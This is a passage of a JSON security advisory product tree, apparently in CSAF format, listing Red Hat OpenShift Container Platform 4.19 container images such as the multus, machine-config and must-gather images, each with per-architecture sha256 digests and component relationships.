"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
